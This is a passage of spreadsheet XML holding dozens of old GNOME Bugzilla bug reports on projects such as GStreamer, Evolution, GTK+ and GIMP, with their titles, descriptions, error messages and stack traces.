Unknown milestone unknown in product gpdf.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was r.oak@nospam.btopenworld.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>r.oak</t>
  </si>
  <si>
    <t>GSTREAMER-477199</t>
  </si>
  <si>
    <t>Linux-UVC webcams not working</t>
  </si>
  <si>
    <t>When trying cheese or gstreamer-properties with my new Logitech Quickcam Pro 9000 i get the following messages.
Cheese:
** Message: Probing the webcam please ignore the following not applicabable tries
** Message: Error running pipeline 'v4l2src ! fakesink': Kunde inte fÃ¥ buffertar frÃ¥n enheten /dev/video0. [v4l2src_calls.c(1025): gst_v4l2src_capture_init (): /pipeline0/v4l2src0:
error requesting 0 buffers: Kan inte allokera minne]
** Message: test pipeline for v4l2src failed:
[v4l2src ! fakesink]: Kunde inte fÃ¥ buffertar frÃ¥n enheten /dev/video0.
gstreamer-properties:
gstreamer-properties-Message: Error running pipeline 'Video for Linux 2 (v4l2)': Kunde inte fÃ¥ buffertar frÃ¥n enheten /dev/video0. [v4l2src_calls.c(1025): gst_v4l2src_capture_init (): /pipeline0/v4l2src3:
error requesting 0 buffers: Kan inte allokera minne]</t>
  </si>
  <si>
    <t>ATK-363128</t>
  </si>
  <si>
    <t>gail should export gailwidget.h</t>
  </si>
  <si>
    <t>gail currently only exports a very small number of interfaces in libgail-util.  These interfaces are provided specifically so that custom widgets can more easily and consistently implement the ATK interfaces.
In general we don't want to export the other gail headers since the implementation details of how ATK is provided for specific widgets is not something we want to require bincompat for nor do we want these interfaces in general to be used externally (other than the ones in libgail-gnome).
However virtually every custom widget ATK implementation in every app or toolkit that implements custom widgets would like to inherit from GailWidget.  GailWidget 's type and class structs are actually very simple so it would not be harmful to expose them this would simplify the task of writing custom widgets somewhat and eliminate the need to do hackish anonymous inheritance tricks as suggested in this paper: http://developer.gnome.org/projects/gap/presentations/GUAD3C/making-apps-accessible/anonymous-inheritance-1.html
I attach a patch which exports gailwidget.h.</t>
  </si>
  <si>
    <t>EVOLUTION-259621</t>
  </si>
  <si>
    <t>List View: Categories column denies knowledge</t>
  </si>
  <si>
    <t>In the List view the contacts column does not display anything at all.
Despite the fact that most of the Contacts actually have one or more 
categories assigned.
Encountered this since Evolution 1.5.9.1 -- Evolution 1.5.8 worked fine
not sure about 1.5.9.</t>
  </si>
  <si>
    <t>GSTREAMER-724790</t>
  </si>
  <si>
    <t>dashdemux: live MPDs are immediately reloaded</t>
  </si>
  <si>
    <t>Created attachment 269788
Initialise demux-&gt;last_manifest_update
Due to demux-&gt;last_manifest_update not being initialised to GST_CLOCK_TIME_NONE live MPDs with a minimumUpdatePeriod attribute are reloaded as soon as the download loop starts i.e. the MPD is downloaded and parsed twice in quick succession.
Attached patch fixes this.</t>
  </si>
  <si>
    <t>floobleflam</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-128989</t>
  </si>
  <si>
    <t>Network-admin refuses admin password</t>
  </si>
  <si>
    <t>I cannot launch network-admin.
It always aswer The password you entered is invalid
I logged as root and relaunched network-admin from gnome and from the
terminal same result.</t>
  </si>
  <si>
    <t>knewbie</t>
  </si>
  <si>
    <t>GIMP-357059</t>
  </si>
  <si>
    <t>Script-Fu</t>
  </si>
  <si>
    <t>Edit &gt; Paste As &gt; Script Errors...</t>
  </si>
  <si>
    <t>Please describe the problem:
The Edit &gt; Paste As &gt; Menu items are active when clipboard is empty causing script errors...
Steps to reproduce:
1. Start Gimp - Do not add anything to clipboard
2. New Image
3. Edit &gt; Paste As &gt; New Image New Brush or New Pattern...
4 Click Ok to save...
Actual results:
New Image does nothing
New Brush or New Pattern = Script error...
Expected results:
Menu items should be inactive if clipboard is empty...
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>jbaker</t>
  </si>
  <si>
    <t>ORCA-535188</t>
  </si>
  <si>
    <t>Page-up and page-down not functioning when reading messages in Thunderbird</t>
  </si>
  <si>
    <t>Please describe the problem:
When reading email messages that are longer than one window full of text you cannot use page-up or page-down to quickly navigate to distant parts of the message. 
Steps to reproduce:
1. In Thunderbird open a long email message.
2. Press page-down then check your location within the text.
3. Go to the end of the message using control-end.
4. press page-up then check your position in the document.
Actual results:
Pressing page-down does not move the carat down through the document.  Pressing page-up does not move the carat upwards through the document.
Expected results:
After pressing page-down the carat would move down through the message by the amount that could be shown within the document window. Pressing page-up would move the carat backwards through the document moving the carat upwards by the amount of text that can fit within the window. 
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>deprice</t>
  </si>
  <si>
    <t>GNOME-UTILS-417864</t>
  </si>
  <si>
    <t>Provide button to quickly analyze home directory contents</t>
  </si>
  <si>
    <t>Currently there is a toolbar button to analyze the disk usage of the file system and another to select a folder to analyze.  However it seems to me that a common use case is to analyze the contents of the user's home directory.  If there were some kind of button or something to provide immediate access to this action it could improve the efficiency of using Baobab.
Not a hugely critical matter but I was thinking today that it would be useful.
Other information:</t>
  </si>
  <si>
    <t>GTK+-303898</t>
  </si>
  <si>
    <t>tests/testgtk.c not using renamed function gdk_cairo_create()</t>
  </si>
  <si>
    <t>Version details: cvs head
Distribution/Version: s10 sparc and x86
On May 10 gdk_drawable_create_cairo_context() was renamed to gdk_cairo_create().
The change was not propogated to tests/testgtk.c.
Attached patch makes the change.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-5627</t>
  </si>
  <si>
    <t>(tasklist_applet Crash at 209.148.71.159)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Version: 1.0.53
Severity: 
&gt;Synopsis: 
&gt;Class: sw-bug
System: RedHat 5.2
&gt;Description:
&gt;How-To-Repeat:
I was Saving as Jpeg in the GIMP and the tasklist crashed.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:54 -------
This bug was previously known as bug 5627 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=5627
Originally filed under the gnome-applets product and general component.
The original reporter (anacaona@dsuper.net) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>anacaona</t>
  </si>
  <si>
    <t>GNOME-CORE-2006</t>
  </si>
  <si>
    <t>Three things to be fixed</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know which package might cause the following but anyway:
Most of the time I start gnome (gnome-session) it hangs after showing
the gnome logo in a window with no frames on a gray background grid.
After the window disappears I have to kill the X server and try again.
Nothing seems to help. I usually need to try at least three times before
I get it run. And as you may guess this is very annoying. When it
eventually starts it first shows the same window with no frames and then
adds the frames as the window manager (I'm using Enlightenment) starts.
Second thing (not that bad) is that the gnome terminal always starts at
~/.gnome-desktop/. I'd like it to start at ~/ and I couldn't find any
guidelines from the documentation on how to do thiss.
And the third one: when I open the desktop popup with right-click
release the button and select new-&gt;terminal with left-click from the
newly opened submenu I have to click twice before the terminal actually
opens. This bug occurs only the first time and opening a second terminal
works fine.
I'm using the standard RH 6.0 distribution.
-Topi-
&gt;
------- Additional Comments From sopwith@redhat.com 1999-09-03 11:49:58 ----
Subject: More info needed
From: Elliot Lee 
To: 2006@bugs.gnome.org
Message-Id: 
Date: Fri 3 Sep 1999 11:49:58 -0400 (EDT)
I don't have any ideas on how to reproduce this problem. Do you have
something like a strange hostname/DNS setup that would cause hangs?
-- Elliot
The time for action is past! Now is the time for senseless bickering!
------- Additional Comments From sopwith@redhat.com 1999-09-13 19:26:22 ----
Subject: No reply?
From: Elliot Lee 
To: 2006@bugs.gnome.org
Message-Id: 
Date: Mon 13 Sep 1999 19:26:22 -0400 (EDT)
I'd love to get to work on fixing this bug but I need more information
from you. Please reply.
-- Elliot
$400 million in gold bullion Ft. Bragg Peking Soviet cryptographic KGB
Ft. Meade plutonium genetic SDI explosion fissionable DES Waco Texas
PLO
------- Additional Comments From ??? 1999-10-30 14:11:24 ----
Subject: More information
From: ??? ??? 
To: 2006@bugs.gnome.org
Message-Id: 
Date: Sat 30 Oct 1999 18:11:24 GMT
I am not the person who originally reported this bug but I'm also 
experiencing one of the problems (about starting gnome). I'm using 
Redhat 6 with Enlightenment as Gnome's Window Manager. My kernel 
version is 2.2.5-15.
When I first log in the X server immediately dies and I am brought 
back to the login screen.
The second time and often the third the splash screen (saying rhad 
labs etc) comes up but with no title bar or border. It stays for 
30-60 seconds and then finally the progress indicator shows up. The 
desktop also takes a long time to load but once it has everything 
works fine except that the logout button/menu item doesn't work. I 
have to kill the X server to get out.
If I kill the X server before it has finished loading and try logging 
in again it usually works (displays progress indicator then splash 
screen with title bar and border and then loads the desktop).
One additional thing: I recently recompiled my kernel and it started 
working fine after that for a while. Unfortunaltely now the problem 
has come back.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 14:58 -------
This bug was previously known as bug 2006 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=2006
Originally filed under the gnome-core product and general component.
The original reporter (topiolli@ees2.oulu.fi) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>topiolli</t>
  </si>
  <si>
    <t>GNOME-VFS-147233</t>
  </si>
  <si>
    <t>Mistreats the cdrom device if not using /dev/cdrom</t>
  </si>
  <si>
    <t>If you use /dev/hdc in your fstab instead of /dev/cdrom nautilus will treat the
device differently. It won't use a CD icon when it's mounted and won't show you
the cd's name. Instead of an eject option nautilus will only have an unmount
one. It almost treats it as a disk volume but it correctly labels it as CDROM:
cdrom in the Computer folder.
Having /dev/hdc instead of /dev/cdrom in fstab is necessary for
gnome-volume-manager to be able to automount the cdrom easily.</t>
  </si>
  <si>
    <t>pedro</t>
  </si>
  <si>
    <t>EVOLUTION-206343</t>
  </si>
  <si>
    <t>message does not get sent when reconnecting from Work Offline</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Cosmetic
Version: 0.12.99
Synopsis: message does not get sent when reconnecting from Work Offline
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Worked offline sent a message reconnected message kept sitting in the Outbox. Have to click Send And Receive to send it.
It would be good to have this done automatically on reconnect
</t>
  </si>
  <si>
    <t>ovy</t>
  </si>
  <si>
    <t>GNUMERIC-52219</t>
  </si>
  <si>
    <t>Don't make left click popup-menu's</t>
  </si>
  <si>
    <t>(Version is Gnumeric CVS 17 March 2001)
1. Start Gnumeric.
2. Left-click the Sum button in the statusbar.
   (Right-clicking will work too)
I always thought that context menu's where supposed to pop-up when
you right-click something :-) There are two possible options to solve this
:
- Disable Left-Clicking
- Put in some other control (like a combo or an option-menu) that does this
is a more correct fashion.</t>
  </si>
  <si>
    <t>GIMP-MANUAL-507568</t>
  </si>
  <si>
    <t>quickreference does not honour ALL_LINGUAS</t>
  </si>
  <si>
    <t>When building documentation with ALL_LINGUAS set quick reference is built for all languages (listed in quickreference/Makefile.am QUICKREFERENCE_ALL_LINGUAS variable).</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-323915</t>
  </si>
  <si>
    <t>Fails to connect to server with https:// URL</t>
  </si>
  <si>
    <t>Version details: 2.5.1-0ubuntu1
Distribution/Version: ubuntu/dapper
When connecting to an Exchange server I get:
Internal error unknown error
'org-gnome-exchange-operations:connect-exchange-error' requested</t>
  </si>
  <si>
    <t>GOSSIP-338334</t>
  </si>
  <si>
    <t>selecting 'show offline' notifies about all</t>
  </si>
  <si>
    <t>When I select 'show offline contacts' then gossip notifies about all the contacts that are visible. This is *highly* annoying. See the screenshot I'm about to attach.</t>
  </si>
  <si>
    <t>RHYTHMBOX-120974</t>
  </si>
  <si>
    <t>Skip unplayable songs.</t>
  </si>
  <si>
    <t>When rhythmbox comes across songs that it cannot play it stops playing at
all.  It would be better to continue playing skipping over the unplayable
song so as not to interupt playback.</t>
  </si>
  <si>
    <t>djcovey</t>
  </si>
  <si>
    <t>GNOME-MENUS-312274</t>
  </si>
  <si>
    <t>gmenu-simple-editor should run regardless of python path</t>
  </si>
  <si>
    <t>If gnome-menus is installed in a non-standard PREFIX and python's PATH settings
do not include this PREFIX gmenu-simple-editor does not run because the python
module could not be loaded.
A simple fix is to include the following snippet into the gmenu-simple-editor
executable (this is a python script) containing the following lines:
import sys
sys.path = [/path/to/dir] + sys.path
This ensures that the program will run with the correct python package.
The path should be generated by some autoconf voodoo magic.</t>
  </si>
  <si>
    <t>GNOME-PANEL-99209</t>
  </si>
  <si>
    <t>mutiple icons on application panel</t>
  </si>
  <si>
    <t>Application panel in gnome2 has the habit of adding more icons then were
assigned to it. It takes the icons there and mutliples their instances 2-5
times. This seems random in the amount it changes everytime i restart gnome2.
This only happens when i add icons to the application panel and not any
other panel.
Here are some screenshots of before and after
http://www.personal.psu.edu/cxd401/screenshots/gnome2/Screenshot.jpg
&lt;--that is how it is suppose to look the way I set it up.
http://www.personal.psu.edu/users/c/x/cxd401/screenshots/gnome2/Screenshotmultipleicons.jpg
this is what it looks like when I restart gnome2.
Hope this helps
Chris</t>
  </si>
  <si>
    <t>cxd401</t>
  </si>
  <si>
    <t>ATK-83501</t>
  </si>
  <si>
    <t>Name of buttons not reported correctly</t>
  </si>
  <si>
    <t>The names of the toggle buttons in the Window List applet are not reported
correctly. This problem happens with version 0.15 or earlier of GAIL.</t>
  </si>
  <si>
    <t>GEDIT-52261</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gedit
Severity: normal
Version: 0.9.0
&gt;Synopsis: 
&gt;Class: sw-bug
System: Linux 2.2.17-18hl14 ppc unknown
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-19 05:00 -------
The original reporter (taguma@c139.glocom.ac.jp) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component chema@celorio.com.
</t>
  </si>
  <si>
    <t>taguma</t>
  </si>
  <si>
    <t>GNOME-SETTINGS-DAEMON-660942</t>
  </si>
  <si>
    <t>power: Close low-battery notification when plugged in</t>
  </si>
  <si>
    <t>From #gnome-shell:
 who is showing the low battery notification the shell ?
 why does that still sit in my message tray long after I plugged in ?
 g-s-d I suppose
* mclasen finds that irritating
Attached patch is my attempt of a fix.</t>
  </si>
  <si>
    <t>florian.muellner</t>
  </si>
  <si>
    <t>GNOME-PANEL-110526</t>
  </si>
  <si>
    <t>Default Button for Applet Preference Dialogs.</t>
  </si>
  <si>
    <t>Mark
Sorry to pester you again but I have another patch for the applet
preference dialogs.  This one fixes up the default button on the dialogs
and it fixes a typo in fish.c.
Can I commit this patch? 
Thank you.
2003-04-10  Dennis Cranston 
        * fish.c: (display_about_dialog) Remove misplaced 
        space.
        * fish.glade:  Make close button the default widget.
2003-04-10  Dennis Cranston  
        * workspace-switcher.glade:  Correct set the default 
        widget and remove an unnecessary vbox.</t>
  </si>
  <si>
    <t>EOG-116015</t>
  </si>
  <si>
    <t>Additional strings in Glade file shows up in .po files</t>
  </si>
  <si>
    <t xml:space="preserve">There are some strings in libgpi/gpi-dialog.glade
that really shouldn't be there and show up in the
.po files. Please clear them. From da.po:
#: libgpi/gpi-dialog.glade.h:23
msgid action_area
msgstr 
#: libgpi/gpi-dialog.glade.h:24
msgid dialog
msgstr 
#: libgpi/gpi-dialog.glade.h:25
msgid dialog1
msgstr 
#: libgpi/gpi-dialog.glade.h:26
msgid vbox
msgstr </t>
  </si>
  <si>
    <t>ole.laursen</t>
  </si>
  <si>
    <t>EVOLUTION-225593</t>
  </si>
  <si>
    <t>Need Insert File and Open File in Signature Editor</t>
  </si>
  <si>
    <t>If I have an HTML file I want to use as my Evolution signature I can't
import it into the Signature editor.
There should be an Insert--&gt;File menu item and a File--&gt;Open menu item as
well.</t>
  </si>
  <si>
    <t>EVOLUTION-200669</t>
  </si>
  <si>
    <t>Don't submit a changed signal in EMinicard unless something has actually changed.</t>
  </si>
  <si>
    <t>EVOLUTION-257475</t>
  </si>
  <si>
    <t>misleading icon of Evolution window</t>
  </si>
  <si>
    <t>The icon displayed for the Evolution main window is misleading. It shows an
envelope always regardless of the current component.
I would expect one of the following behaviors:
a) Display a specialized icon depending on the current component.
b) Display a component neutral icon like the Evolution logo all the time.
$ rpm -q evolution1.5
evolution1.5-1.5.7.0.200404220543-0.snap.ximian.6.1</t>
  </si>
  <si>
    <t>GTK+-169961</t>
  </si>
  <si>
    <t>Setting strikethrough on GtkCellRendererText should cause redraw</t>
  </si>
  <si>
    <t>Changing the strikethrough property on a GtkCellRendererText object should
cause redraw on the visible part of the column.  It does not.  The
strikethrough appears as you move the cursor over the data.</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-272784</t>
  </si>
  <si>
    <t>Unnecessary warning message when no changes made ot an account.</t>
  </si>
  <si>
    <t>Description of Problem:
When account editor is closed by pressing OK button
without making any change to Exchange account
warning saying changes will take effect after Evolution is 
restarted
Steps to reproduce the problem:
1. Open account editor for Exchange account. 
2. Close the editor by pressing OK button instead of cancel.
Actual Results:
Shows the warning dialog.
Expected Results:
Should not throw any warning as no changes made to the account.
How often does this happen? 
Always</t>
  </si>
  <si>
    <t>GNOME-COMMANDER-129325</t>
  </si>
  <si>
    <t>delete not moved files</t>
  </si>
  <si>
    <t>1. Choose some files and move them to another place.
2. If in the destination directory a file with the same name exist gcmd
ask what to do.
3. Choose jump over/not overwrite
4. ALL selected files are be deleted.
I think the files which exists on the destination should not be deleted.</t>
  </si>
  <si>
    <t>marbj499</t>
  </si>
  <si>
    <t>GALEON-53218</t>
  </si>
  <si>
    <t>Problems with main bookmark folder toolbar</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: 0.10.4
Synopsis: Problems with main bookmark folder toolbar
Bugzilla-Product: galeon
Bugzilla-Component: Bookmarks
Description:
From the bookmark editing window it doesn't seem to be possible to specify that you want to 
turn the main bookmark folder into a toolbar moreover if you select this option from the 
bookmark menu itself it doesn't persist - the toolbar is gone the next time Galeon starts.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-04-15 01:14 -------
The original reporter (tbarrie@giantantfarm.dyn.dhs.org) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component ric@users.sourceforge.net.
</t>
  </si>
  <si>
    <t>tbarrie</t>
  </si>
  <si>
    <t>EVOLUTION-204780</t>
  </si>
  <si>
    <t>Evo reports non-useful error if bonobo-conf is broken</t>
  </si>
  <si>
    <t>After upgrading to the latest Evo snapshot from Red-Carpet
(evolution-0.10.99-snap.ximian.200107121517) attempting to launch Evo
results in an Error dialogue informing that Evo has crashed.  In addition
the following message is sent to stdout or stderr in the shell where Evo is
launched:
evolution-shell-WARNING **: CORBA exception IDL:CORBA/COMM_FAILURE:1.0 when
requesting URI -- evolution:/local/Inbox</t>
  </si>
  <si>
    <t>the_dreem</t>
  </si>
  <si>
    <t>EVOLUTION-229693</t>
  </si>
  <si>
    <t>Marquette won't display weather</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: GNOME2.0.1 CVS
Synopsis: Marquette won't display weather
Bugzilla-Product: Evolution
Bugzilla-Component: Summary [was My Evolution]
Description:
I have Marquette Chicago and Boston setup to show the weather in the
Summary section.  For some reason though Marquette won't display on the
Summary page whatsoever.  Boston and Chicago do.
Are there any XML files I can attach to this bug to help debug or
something like that?
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>ACCERCISER-453330</t>
  </si>
  <si>
    <t>Got an error at exit [@ cl.set_int(GCONF_GENERAL+'/vpaned' position)]</t>
  </si>
  <si>
    <t>Please describe the problem:
Start accerciser and quit
Got an error message in terminal
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/accerciser/accerciser.py line 189 in _onQuit
    self._shutDown()
  File /usr/lib/python2.5/site-packages/accerciser/accerciser.py line 179 in _shutDown
    self.window.saveState()
  File /usr/lib/python2.5/site-packages/accerciser/main_window.py line 163 in saveState
    cl.set_int(GCONF_GENERAL+'/vpaned' position)
TypeError: an integer is required
If you can't reproduce this problem you can delete gconf key /apps/accerciser/general/vpaned with gconf-editor first.
Once the key if set it can't be reproduced.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
No error message at exit
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>accerciser-devel</t>
  </si>
  <si>
    <t>ginnchen</t>
  </si>
  <si>
    <t>EVOLUTION-352131</t>
  </si>
  <si>
    <t>Crashes while expunging mails</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Get emails from imap/ssl server
2. Expunge a couple of emails
3. 
Stack trace:
Stacktrace (from bug-buddy)
Memory status: size: 173223936 vsize: 0 resident: 173223936 share: 0 rss: 29179904 rss_rlim: 0
CPU usage: start_time: 1156080579 rtime: 0 utime: 358 stime: 0 cutime:324 cstime: 0 timeout: 34 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/evolution-2.8'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1233869136 (LWP 14859)]
[New Thread -1339577440 (LWP 14878)]
[Thread debugging using libthread_db enabled]
[New Thread -1233869136 (LWP 14859)]
[New Thread -1339577440 (LWP 14878)]
[Thread debugging using libthread_db enabled]
[New Thread -1233869136 (LWP 14859)]
[New Thread -1339577440 (LWP 14878)]
[New Thread -1331184736 (LWP 14877)]
[New Thread -1313191008 (LWP 14873)]
[New Thread -1290802272 (LWP 14871)]
[New Thread -1282409568 (LWP 14869)]
[New Thread -1272173664 (LWP 14868)]
[New Thread -1263780960 (LWP 14867)]
[New Thread -1254769760 (LWP 14866)]
0xffffe410 in ?? ()
#0  0xffffe410 in ?? ()
#1  0xbfc7a3cc in ?? ()
#2  0x00000063 in ?? ()
#3  0x0000000e in ?? ()
#4  0xb68862ba in loser_poll (fds=0xb68efff4 nfds=14 timeout=99)
    at ../sysdeps/unix/sysv/linux/poll.c:48
#5  0xb688637d in *__GI___poll (fds=0x87a81f0 nfds=14 timeout=99)
    at ../sysdeps/unix/sysv/linux/poll.c:76
#6  0xb69217f6 in g_main_context_iterate (context=0x80a3e10 block=1 
    dispatch=1 self=0x806dc00) at gmain.c:2977
#7  0xb6921b8a in IA__g_main_loop_run (loop=0x81b8c60) at gmain.c:2879
#8  0xb76fbb50 in bonobo_main () at bonobo-main.c:311
#9  0x0805ebf5 in main (argc=99 argv=0x0) at main.c:614
Thread 9 (Thread -1254769760 (LWP 14866)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0xb535b34c in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x00000002 in ?? ()
No symbol table info available.
#4  0xb68862ba in loser_poll (fds=0xb68efff4 nfds=2 timeout=-1)
    at ../sysdeps/unix/sysv/linux/poll.c:48
	resultvar = 4294967292
	errno_saved = 11
	must_emulate = 0
#5  0xb688637d in *__GI___poll (fds=0x82d1a60 nfds=2 timeout=-1)
    at ../sysdeps/unix/sysv/linux/poll.c:76
	oldtype = 0
	result = -1
#6  0xb69217f6 in g_main_context_iterate (context=0x82ca808 block=1 
    dispatch=1 self=0x82d6078) at gmain.c:2977
	got_ownership = -4
	max_priority = 2147483647
	timeout = -1
	some_ready = -1
	nfds = 2
	allocated_nfds = -1
	fds = (GPollFD *) 0x82d1a60
	__PRETTY_FUNCTION__ = g_main_context_iterate
#7  0xb6921b8a in IA__g_main_loop_run (loop=0x82ced20) at gmain.c:2879
	got_ownership = -1208117744
	self = (GThread *) 0x82d6078
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#8  0xb6a398e8 in libnm_glib_dbus_worker (user_data=0x82d2dc8)
    at libnm_glib.c:423
	__PRETTY_FUNCTION__ = libnm_glib_dbus_worker
#9  0xb693c979 in g_thread_create_proxy (data=0x82d6078) at gthread.c:553
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#10 0xb6a24604 in start_thread (arg=0xb535bba0) at pthread_create.c:261
	__res = (void *) 0xfffffffc
	__ignore1 = 2
	__ignore2 = -1
	pd = (struct pthread *) 0xb535bba0
	now = #0  0xffffe410 in ?? ()
Other information:
This does NOT happend very often. Unfortunatly I'm having a hard time pinpointing what exactly triggers these crashes...</t>
  </si>
  <si>
    <t>frederic.bellaiche</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-157033</t>
  </si>
  <si>
    <t>[PATCH] broken schemas closing tag</t>
  </si>
  <si>
    <t xml:space="preserve">2 schemas files are broken in 2.9.1:
libgnomegames.schemas:53: parser error : Premature end of data in tag
gconfschemafile line 53
</t>
  </si>
  <si>
    <t>EVOLUTION-221653</t>
  </si>
  <si>
    <t>contacts subfolders</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 1.0.2
Synopsis: contacts subfolders
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
Description of Problem:
I've tried to organize my contacts by separating them into separate
contacts folders.  These folders are subfolders of the default
Contacts folder and are represented by the same icon.  However when
I right-click on a blue underlined email address in some message I am
prompted to add to contacts even though the address is already saved
as one of my contacts.
Steps to reproduce the problem:
1. Create subfolders of the default Contacts subfolder and move some
contacts there.
2. In the INBOX (or elsewhere) find a message containing the email
address of such a contact.  Right-click it.
Actual Results:
The pop-up includes only an option to Add to contacts.
Expected Results:
Contacts subfolders should be recognized as contacts.
How often does this happen?
Every time.
</t>
  </si>
  <si>
    <t>nam1</t>
  </si>
  <si>
    <t>EVOLUTION-230745</t>
  </si>
  <si>
    <t>Manage subscriptions status bar behaviour</t>
  </si>
  <si>
    <t>When managing subscriptions the status bar that shows the evolution :) of
folders download does not vanish at the end of the process.
It would be nice to attach a screenshot of the bugs.</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-344674</t>
  </si>
  <si>
    <t>Compile error with cvs</t>
  </si>
  <si>
    <t>I'm getting the following (would only be a warning if not for -Werror it appears):
gpm-tray-icon.c: In function `libnotify_event':
gpm-tray-icon.c:857: warning: implicit declaration of function `gtk_message_dialog_format_content_markup'
gpm-tray-icon.c:857: warning: nested extern declaration of `gtk_message_dialog_format_content_markup'
make[3]: *** [gpm-tray-icon.o] Error 1
make[3]: Leaving directory `/floss/building/gnome/gnome-power-manager/src'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/floss/building/gnome/gnome-power-manager/src'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/floss/building/gnome/gnome-power-manager'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>DOXYGEN-508759</t>
  </si>
  <si>
    <t>Fortran parameter lists produce wrong chars in html</t>
  </si>
  <si>
    <t>Please describe the problem:
In version 1.5.4-20080101 I get wrong characters when the parameter list of a subroutine is not empty.
Steps to reproduce:
Input file:
subroutine my(arg)
  integer arg
  return
end subroutine
standard doxygen config file
Actual results:
The output in html is
subroutine 	my ï¿½ï¿½Q)
in the summary and 
subroutine my  	(  	  	 )   
in the documentation.
Expected results:
subroutine my(arg) resp.
subroutine my(integer arg)
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>ole.streicher</t>
  </si>
  <si>
    <t>ATK-139391</t>
  </si>
  <si>
    <t>'Name' table column not reported in nautilus</t>
  </si>
  <si>
    <t>using gnopernicus 0.8.1-1
-launch gnopernicus
-launch nautilus
-select 'View' -&gt; 'View as list'
-navigate to the list pane
.gnopernicus reports 'table line 4 items '
.the 'name' value is not spoken or showing up with braille.
this does not happen with the first table column in the gnome 'open file'
window so it may be a nautilus bug.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-77872</t>
  </si>
  <si>
    <t>Can't add menubar applet</t>
  </si>
  <si>
    <t>get this error whenever i try to add a menubar applet to the panel
---------------------------------------------------------------
There was a problem loading applet 'OAFIID:GNOME_PanelMenuApplet'
Details: g_module_open of `libpanel-menu.so' failed with `libpanel-menu.so:
cannot open shared object file: No such file or directory'</t>
  </si>
  <si>
    <t>cphelps.home</t>
  </si>
  <si>
    <t>EVOLUTION-230827</t>
  </si>
  <si>
    <t>Delete on Deleted Message Does not move to next</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
In the past if my cursor came to a message that was already deleted and I
hit delete it just moved my cursor to the next message (as it did with any
other message)  (not sure of what REALLY happened under the covers).  Now
it seems that the move to next mesesage does not occur if the message is
already deleted.
Steps to reproduce the problem:
1. Highlight a deleted message
2. Hit Ctrl-D
3. Watch Cursor not move
Actual Results:
Cursor doesn't move
Expected Results:
Should move to next message like in the past
How often does this happen? 
Seemingly this broke recently but maybe I just missed it when it broke.
Additional Information:
Snap 200209200601</t>
  </si>
  <si>
    <t>GNOME-SETTINGS-DAEMON-683746</t>
  </si>
  <si>
    <t>updates</t>
  </si>
  <si>
    <t>When plymouth is not running offline updates give no feedback</t>
  </si>
  <si>
    <t>I have a broken plymouth on my laptop currently in this scenario offline updates are performed silently with no feedback of what's happening on the VT console.
I think displaying some kind of feedback is required even in that situation as
- installing updates can take a long time and doing so without any feedback is dangerous (e.g. the user could think something went wrong and decide to pull the cord)
- it's reassuring for the user to see the system state and progress during a critical operation</t>
  </si>
  <si>
    <t>cosimo.cecchi</t>
  </si>
  <si>
    <t>PAN-345784</t>
  </si>
  <si>
    <t>Crashes on sorting threads by subject</t>
  </si>
  <si>
    <t>When I try to sort headers by subject in Pan .100 it crashes every time. (WinXP)
Program received signal SIGSEGV Segmentation fault.
0x10037a2c in ?? ()
(gdb) bt
#0  0x10037a2c in ?? ()
